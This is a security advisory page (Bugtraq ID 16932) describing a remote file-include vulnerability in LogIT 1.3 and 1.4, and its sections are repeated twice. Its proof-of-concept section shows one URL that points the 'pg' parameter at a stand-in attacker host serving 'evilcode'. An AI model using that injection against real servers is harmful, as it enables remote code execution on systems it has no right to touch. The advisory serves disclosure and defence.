LogIT Remote File Include Vulnerability
BID:16932
Info
LogIT Remote File Include Vulnerability
| Bugtraq ID: | 16932 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 02 2006 12:00AM |
| Updated: | Mar 08 2006 06:40AM |
| Credit: | Discovered by <[email protected]>. |
| Vulnerable: |
logIT logIT 1.4 logIT logIT 1.3 |
| Not Vulnerable: | |
Discussion
LogIT Remote File Include Vulnerability
LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input.
Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process.
LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.
LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input.
Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process.
LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.
Exploit / POC
LogIT Remote File Include Vulnerability
An exploit is not required.
Proof of concept examples are available:
http://www.example.com/?pg=http://www.example2.com/evilcode
An exploit is not required.
Proof of concept examples are available:
http://www.example.com/?pg=http://www.example2.com/evilcode
Solution / Fix
LogIT Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]